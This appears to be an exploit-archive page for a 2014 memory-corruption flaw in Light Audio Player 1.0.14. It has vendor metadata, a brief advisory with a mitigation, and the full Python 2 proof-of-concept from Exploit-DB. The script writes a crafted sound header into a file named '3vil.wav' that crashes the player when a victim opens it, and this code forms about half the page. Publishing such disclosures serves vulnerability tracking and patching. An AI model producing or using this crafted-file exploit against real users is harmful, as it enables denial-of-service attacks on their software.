header-logo
Suggest Exploit
vendor:
Light Audio Player
by:
TUNISIAN CYBER
7,5
CVSS
HIGH
DoS/PoC
119
CWE
Product Name: Light Audio Player
Affected Version From: 1.0.14
Affected Version To: 1.0.14
Patch Exists: YES
Related CWE: N/A
CPE: a:light_audio_player:light_audio_player:1.0.14
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: WinXp/Windows 7 Pro
2014

Light Audio Player 1.0.14 Memory Corruption PoC

Light Audio Player 1.0.14 is vulnerable to a memory corruption vulnerability. An attacker can exploit this vulnerability by crafting a malicious .wav file and sending it to the victim. When the victim opens the malicious file, the application will crash.

Mitigation:

Update to the latest version of Light Audio Player.
Source

Exploit-DB raw data:

#!/usr/bin/python

#[+] Author: TUNISIAN CYBER
#[+] Exploit Title: Light Audio Player 1.0.14 Memory Corruption PoC
#[+] Date: 22-03-2014
#[+] Category: DoS/PoC
#[+] Tested on: WinXp/Windows 7 Pro
#[+] Vendor: http://download.cnet.com/Light-Audio-Player/3000-2139_4-10791618.html
#[+] Friendly Sites: na3il.com,th3-creative.com
#[+] Twitter: @TCYB3R
 
import os
os.system("color 02")

print"###########################################################"
print"#  Title: Light Audio Player 1.0.14 Memory Corruption PoC  #"
print"#  Author: TUNISIAN CYBER                                  #"
print"#  Category: DoS/PoC                                       # "
print"###########################################################"
	
header=("\x2E\x73\x6E\x64\x00\x00\x01\x18\x00\x00\x42\xDC\x00\x00\x00\x01"
"\x00\x00\x1F\x40\x00\x00\x00\x00\x69\x61\x70\x65\x74\x75\x73\x2E"
"\x61\x75\x00\x20\x22\x69\x61\x70\x65\x74\x75\x73\x2E\x61\x75\x22"
"\x00\x31\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00")
 
filename = "3vil.wav"
file = open(filename , "w")
file.write(header)
print "\n Files Created!\n"
file.close()

Navigation

Suggest Exploit

Services By CQR